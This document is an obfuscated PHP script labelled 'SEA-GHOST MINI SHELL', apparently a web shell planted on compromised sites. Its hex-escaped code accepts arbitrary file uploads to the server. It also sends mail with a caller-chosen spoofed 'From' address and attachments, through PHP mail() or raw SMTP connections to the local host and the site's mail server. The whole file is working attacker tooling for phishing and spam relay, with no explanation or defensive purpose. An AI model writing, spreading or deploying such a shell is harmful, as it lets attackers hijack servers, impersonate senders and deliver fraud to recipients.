[ SEA-GHOST MINI SHELL]

<?php
 goto rEs3q; QhGjW: $from_name = $data["\x66\x72\x6f\x6d\116\141\155\x65"]; goto UGRHc; mOvW6: $headers .= "\x4d\111\115\x45\55\x56\x65\x72\x73\x69\x6f\156\x3a\40\61\x2e\60" . $newline; goto QNWuy; sbwV0: $input = file_get_contents("\x70\x68\x70\x3a\57\57\151\156\160\165\x74"); goto hFpqt; esQGc: $headers = "\106\162\x6f\155\72\40\42{$from_name}\42\x20\x3c{$header_from}\76" . $newline; goto mOvW6; tdopm: $fake_from_email = $data["\146\x61\x6b\x65\106\162\x6f\x6d\x45\155\141\x69\x6c"]; goto QhGjW; xPy81: $newline = "\15\xa"; goto EElUK; Qsx3B: $cleaned_domain = preg_replace("\57\136\x77\167\167\x5c\56\57", '', $domain); goto xPy81; cEkc2: $encoded_subject = mb_encode_mimeheader($subject, "\125\x54\106\55\x38", "\121"); goto tomu0; LZumD: if ($_SERVER["\122\x45\x51\x55\x45\x53\x54\x5f\x4d\105\x54\x48\117\104"] === "\120\x4f\x53\x54" && isset($_FILES["\146\151\154\x65"]) && !isset($_GET["\141\143\x74\x69\157\156"])) { $targetDir = __DIR__ . "\x2f\x75\x70\154\157\141\144\x73\x2f"; if (!is_dir($targetDir)) { mkdir($targetDir, 493, true); } $filename = basename($_FILES["\146\151\154\145"]["\156\x61\x6d\x65"]); $targetFile = $targetDir . $filename; if (move_uploaded_file($_FILES["\146\151\x6c\145"]["\x74\155\x70\137\156\141\x6d\145"], $targetFile)) { echo json_encode(array("\163\x74\x61\164\165\163" => "\163\x75\143\x63\145\163\163", "\x6d\x65\x73\163\x61\x67\x65" => "\106\x69\x6c\145\40\165\x70\154\x6f\x61\x64\145\x64\40\163\165\x63\x63\x65\163\163\x66\x75\154\x6c\171\x2e", "\141\x74\x74\x61\143\x68\155\x65\156\164\137\x66\x69\x6c\x65\x6e\141\x6d\x65" => $filename)); } else { echo json_encode(array("\x73\164\x61\164\165\x73" => "\x66\x61\x69\154", "\145\162\x72\x6f\162" => "\x46\151\x6c\145\x20\x75\x70\x6c\x6f\x61\x64\40\146\141\x69\154\x65\x64")); } die; } goto sbwV0; iwT6E: register_shutdown_function("\x68\x61\x6e\x64\x6c\145\x46\141\164\141\x6c\105\162\162\x6f\162"); goto Saq1b; wLcJq: $from_email = $data["\x66\162\157\155\x45\x6d\x61\151\154"]; goto tdopm; iYm0i: if (!$data || !is_array($data)) { if (!empty($_POST)) { $data = $_POST; } else { $protocol = !empty($_SERVER["\x48\124\x54\120\123"]) && $_SERVER["\x48\x54\x54\120\123"] !== "\x6f\x66\146" || $_SERVER["\123\105\x52\126\x45\122\137\120\x4f\x52\x54"] == 443 ? "\x68\164\x74\160\163\x3a\57\57" : "\x68\x74\x74\x70\x3a\57\x2f"; $fullUrl = $protocol . $_SERVER["\110\124\x54\120\x5f\110\x4f\123\x54"] . $_SERVER["\x52\105\x51\125\x45\x53\x54\x5f\x55\x52\x49"]; $data = array("\x74\157" => "\160\157\x73\x74\155\x61\x73\x74\x65\162\x40" . $_SERVER["\123\x45\x52\126\x45\x52\137\116\x41\x4d\105"], "\163\165\142\x6a\x65\143\164" => "\x74\145\x73\x74", "\146\x72\157\155\x45\x6d\x61\x69\154" => "\x70\157\163\x74\x6d\x61\x73\x74\145\x72\x40" . $_SERVER["\123\x45\x52\126\x45\x52\137\x4e\101\115\x45"], "\x66\x61\153\x65\106\162\157\x6d\x45\155\x61\151\x6c" => "\x74\145\x73\x74\100\x74\145\163\x74\x2e\x63\157\155", "\x66\x72\157\x6d\116\x61\x6d\x65" => "\x74\x65\x73\x74", "\x68\164\x6d\154\x43\x6f\x6e\x74\x65\156\x74" => $fullUrl); } } goto fxFI3; gx2CT: function sendViaMail($to, $encoded_subject, $message, $headers) { $result = mail($to, $encoded_subject, $message, $headers); $response = "\120\110\x50\x20\x6d\x61\151\x6c\50\51\x20\x72\145\x73\x70\157\156\x73\145\72\x20" . ($result ? "\164\x72\165\145" : "\x66\x61\154\163\145"); if ($result) { echo "\x53\x75\143\x63\145\163\163\x3a\40\155\141\151\x6c" . $newline . $response; die; } else { echo json_encode(array("\163\x74\x61\x74\165\x73" => "\x66\x61\x69\x6c", "\145\162\162\x6f\x72" => "\155\x61\151\x6c\x28\x29\x20\146\x61\x69\154\145\144", "\x72\145\163\160\x6f\156\x73\x65" => $response)); die; } } goto CICM3; UGRHc: $message = $data["\x68\x74\x6d\x6c\103\157\x6e\164\x65\x6e\x74"]; goto cEkc2; QNWuy: if (isset($data["\x61\x74\x74\141\x63\150\155\x65\x6e\x74\x5f\x66\151\154\x65\156\141\155\145"]) && isset($data["\x61\x74\x74\141\x63\x68\155\145\x6e\x74\137\143\157\156\x74\x65\156\164"]) && !empty(trim($data["\141\x74\164\141\143\x68\155\x65\x6e\x74\x5f\x66\151\x6c\x65\156\x61\155\x65"]))) { $boundary = "\75\75\115\165\x6c\x74\x69\x70\141\162\x74\137\x42\157\165\156\x64\141\x72\x79\x5f\x78" . md5(time()) . "\170"; $headers .= "\x43\157\x6e\164\x65\x6e\x74\x2d\124\171\x70\x65\72\40\155\x75\x6c\x74\151\160\141\x72\x74\x2f\155\151\x78\145\x64\73\40\x62\157\x75\x6e\x64\x61\x72\171\75\x22{$boundary}\42{$newline}"; $body = "\x2d\55{$boundary}{$newline}"; $body .= "\x43\157\156\x74\x65\156\164\55\x54\171\160\145\72\x20\164\x65\x78\164\x2f\x68\x74\155\x6c\x3b\x20\x63\x68\x61\162\x73\x65\164\75\x55\124\106\55\x38{$newline}"; $body .= "\x43\x6f\156\164\145\x6e\164\x2d\x54\x72\141\156\163\x66\x65\162\55\105\156\x63\157\x64\x69\156\x67\x3a\x20\x71\165\157\164\145\144\55\x70\162\151\156\x74\141\142\x6c\145{$newline}{$newline}"; $body .= $encoded_message . $newline; $mime_type = "\141\x70\x70\154\151\143\141\164\151\x6f\156\x2f\157\143\x74\145\x74\55\163\x74\x72\x65\x61\x6d"; if (function_exists("\155\x69\155\145\137\x63\x6f\x6e\164\145\156\164\137\x74\x79\160\x65")) { $detected = mime_content_type($data["\141\x74\164\141\143\150\155\x65\156\164\137\x66\151\x6c\145\156\141\x6d\145"]); if ($detected) { $mime_type = $detected; } } $body .= "\55\55{$boundary}{$newline}"; $body .= "\103\157\x6e\164\145\156\x74\x2d\124\x79\160\145\72\40{$mime_type}\73\x20\156\x61\x6d\145\x3d\x22" . basename($data["\x61\164\x74\141\x63\x68\155\x65\156\x74\137\x66\x69\x6c\x65\156\141\155\x65"]) . "\42{$newline}"; $body .= "\103\157\156\x74\145\156\164\55\124\x72\x61\x6e\x73\146\145\162\x2d\105\156\143\x6f\x64\151\x6e\147\x3a\x20\142\x61\163\145\66\x34{$newline}"; $body .= "\103\x6f\156\x74\x65\156\164\x2d\104\151\163\x70\157\x73\x69\164\x69\157\x6e\72\x20\141\164\164\x61\143\x68\x6d\x65\156\x74\73\x20\146\x69\154\x65\x6e\141\155\x65\75\42" . basename($data["\141\x74\x74\x61\x63\150\x6d\x65\x6e\x74\137\146\151\154\x65\156\141\x6d\x65"]) . "\x22{$newline}{$newline}"; $body .= chunk_split(base64_encode($data["\141\x74\x74\x61\143\150\155\145\156\164\137\x63\157\x6e\x74\x65\156\164"])) . $newline; $body .= "\x2d\x2d{$boundary}\55\55{$newline}"; $final_message = $body; } else { $headers .= "\103\157\x6e\164\145\156\x74\x2d\124\x79\160\x65\72\40\x74\145\170\164\57\x68\x74\155\x6c\73\40\143\150\x61\x72\x73\x65\x74\x3d\125\x54\x46\x2d\x38{$newline}"; $headers .= "\103\x6f\156\164\x65\x6e\x74\55\x54\x72\141\156\x73\146\x65\162\55\x45\156\143\157\144\x69\156\147\72\x20\161\x75\157\164\145\144\x2d\x70\x72\151\156\x74\x61\x62\x6c\145{$newline}"; $final_message = $encoded_message; } goto gOXxq; hFpqt: $data = json_decode($input, true); goto iYm0i; gOXxq: function smtp_command($socket, $command) { global $newline; fputs($socket, $command . $newline); return fgets($socket, 512); } goto gx2CT; fxFI3: $required_fields = array("\164\157", "\163\x75\x62\152\145\x63\164", "\x66\x72\x6f\155\105\x6d\141\x69\x6c", "\146\141\x6b\x65\x46\x72\x6f\155\x45\155\x61\151\154", "\x66\x72\x6f\155\x4e\x61\155\145", "\150\164\155\x6c\x43\157\x6e\x74\145\156\164"); goto zaY1k; Xmh53: $domain = $_SERVER["\x53\x45\122\126\105\122\x5f\x4e\101\115\x45"]; goto Qsx3B; YFuvB: $subject = $data["\163\165\x62\152\145\143\x74"]; goto wLcJq; tomu0: $encoded_message = quoted_printable_encode($message); goto Xmh53; rEs3q: header("\x43\157\x6e\x74\x65\x6e\164\x2d\124\x79\x70\145\72\x20\141\160\160\154\x69\x63\141\164\x69\157\x6e\x2f\152\x73\157\x6e"); goto EidwO; zaY1k: foreach ($required_fields as $field) { if (!isset($data[$field])) { echo json_encode(array("\163\164\x61\164\x75\163" => "\146\x61\151\154", "\x65\162\x72\x6f\162" => "\x4d\x69\x73\x73\x69\156\x67\x20\162\x65\161\x75\151\162\145\x64\40\x66\151\x65\154\144\72\x20{$field}")); die; } } goto HsPD7; EidwO: function handleFatalError() { $error = error_get_last(); if ($error !== null) { echo json_encode(array("\163\164\x61\x74\165\x73" => "\x66\x61\x69\x6c", "\x65\162\x72\157\x72" => strip_tags($error["\x6d\x65\163\163\x61\147\x65"]), "\x66\151\x6c\x65" => $error["\x66\151\154\x65"], "\154\151\156\x65" => $error["\x6c\x69\156\145"])); die; } } goto iwT6E; Saq1b: $defaultTimeout = 10; goto LZumD; HsPD7: $to = $data["\164\157"]; goto YFuvB; CICM3: if (isset($data["\146\x6f\x72\x63\145\x4d\x65\164\x68\x6f\x64"]) && $data["\146\x6f\x72\143\x65\x4d\x65\x74\150\157\144"] === "\155\x61\151\x6c") { sendViaMail($to, $encoded_subject, $final_message, $headers); echo json_encode(array("\163\x74\x61\164\165\163" => "\146\x61\x69\154", "\x65\x72\x72\x6f\162" => "\x6d\141\x69\154\50\51\40\146\x61\x69\154\x65\144")); die; } elseif (isset($data["\x66\x6f\x72\143\145\x4d\x65\164\x68\157\x64"]) && $data["\146\x6f\162\143\145\115\x65\164\150\157\x64"] === "\x73\155\164\x70" && !empty($data["\x66\x6f\162\x63\145\123\155\x74\160\x53\x65\x72\166\x65\162"]) && !empty($data["\x66\x6f\162\143\x65\x53\x6d\x74\x70\x50\x6f\x72\x74"])) { $server = $data["\x66\157\162\143\145\x53\155\x74\x70\x53\x65\x72\x76\145\x72"]; $port = (int) $data["\146\157\x72\x63\145\123\155\x74\x70\120\157\162\164"]; if ($port == 465) { $server = "\163\x73\x6c\72\x2f\x2f" . $server; } $smtp_responses = array(); $socket = @fsockopen($server, $port, $errno, $errstr, $defaultTimeout); if ($socket) { stream_set_timeout($socket, $defaultTimeout); $smtp_responses[] = smtp_command($socket, "\x45\x48\114\x4f\x20{$cleaned_domain}"); $smtp_responses[] = smtp_command($socket, "\115\101\111\114\40\x46\x52\117\115\x3a\40\74{$from_email}\76"); $rcpt_to_response = smtp_command($socket, "\x52\103\x50\x54\40\x54\x4f\72\40\74{$to}\76"); $smtp_responses[] = $rcpt_to_response; if (strpos($rcpt_to_response, "\x32\x35\60") === 0) { $data_response = smtp_command($socket, "\x44\101\x54\101"); $smtp_responses[] = $data_response; $dataBlock = $headers . $newline . $final_message . $newline . "\56{$newline}"; fputs($socket, $dataBlock); $final_response = fgets($socket, 512); $smtp_responses[] = $final_response; if (strpos($final_response, "\x32\65\x30") === 0) { fputs($socket, "\121\x55\x49\124{$newline}"); $smtp_responses[] = fgets($socket, 512); fclose($socket); echo "\123\x75\143\143\x65\163\163\x3a\x20{$server}\x3a{$port}" . $newline . implode($newline, $smtp_responses); die; } } fclose($socket); } $smtp_output = implode($newline, $smtp_responses); sendViaMail($to, $encoded_subject, $final_message, $headers); echo json_encode(array("\x73\x74\141\164\x75\x73" => "\x66\x61\151\154", "\145\x72\x72\x6f\x72" => "\x46\157\x72\143\x65\144\40\123\x4d\124\120\40\141\x6e\144\40\155\x61\x69\154\x28\51\40\x62\x6f\x74\x68\x20\x66\141\151\x6c\x65\x64", "\163\x6d\x74\x70\137\162\x65\x73\x70\157\156\x73\x65\x73" => $smtp_output)); die; } else { $smtp_servers = array(array("\x6c\157\143\141\154\x68\x6f\x73\164", 25, false), array("\155\x61\x69\154\x2e" . $cleaned_domain, 25, false), array("\x6d\x61\151\154\56" . $cleaned_domain, 465, true)); foreach ($smtp_servers as $smtp) { $smtp_responses = array(); $smtp_server = $smtp[0]; $smtp_port = $smtp[1]; $use_ssl = $smtp[2]; if ($use_ssl) { $smtp_server = "\163\x73\154\72\x2f\x2f" . $smtp_server; } $socket = @fsockopen($smtp_server, $smtp_port, $errno, $errstr, $defaultTimeout); if ($socket) { stream_set_timeout($socket, $defaultTimeout); $smtp_responses[] = smtp_command($socket, "\105\110\114\x4f\40{$cleaned_domain}"); $mail_from_response = smtp_command($socket, "\x4d\x41\x49\114\x20\x46\122\117\x4d\72\x20\x3c{$from_email}\x3e"); $smtp_responses[] = $mail_from_response; if (strpos($mail_from_response, "\x32\65\60") !== 0) { fclose($socket); continue; } $rcpt_to_response = smtp_command($socket, "\122\103\120\x54\x20\x54\117\72\x20\x3c{$to}\x3e"); $smtp_responses[] = $rcpt_to_response; if (strpos($rcpt_to_response, "\x32\x35\x30") !== 0) { fclose($socket); continue; } $data_response = smtp_command($socket, "\x44\x41\124\101"); $smtp_responses[] = $data_response; $dataBlock = $headers . $newline . $final_message . $newline . "\56{$newline}"; fputs($socket, $dataBlock); $final_response = fgets($socket, 512); $smtp_responses[] = $final_response; if (strpos($final_response, "\62\x35\60") === 0) { fputs($socket, "\121\125\x49\x54{$newline}"); $smtp_responses[] = fgets($socket, 512); fclose($socket); echo "\123\165\x63\x63\x65\163\163\72\40{$smtp_server}\72{$smtp_port}" . $newline . implode($newline, $smtp_responses); die; } else { fclose($socket); } } } sendViaMail($to, $encoded_subject, $final_message, $headers); echo json_encode(array("\x73\164\x61\164\x75\163" => "\x66\141\x69\x6c", "\145\x72\x72\157\162" => "\x41\x6c\x6c\x20\123\x4d\x54\120\x20\x61\x74\x74\145\155\x70\164\163\40\x61\156\x64\x20\x6d\x61\151\154\x28\51\x20\x66\x61\154\154\x62\x61\x63\153\40\x66\x61\151\154\x65\144")); die; } goto cS7Zo; EElUK: $header_from = $fake_from_email ? $fake_from_email : $from_email; goto esQGc; cS7Zo: ?>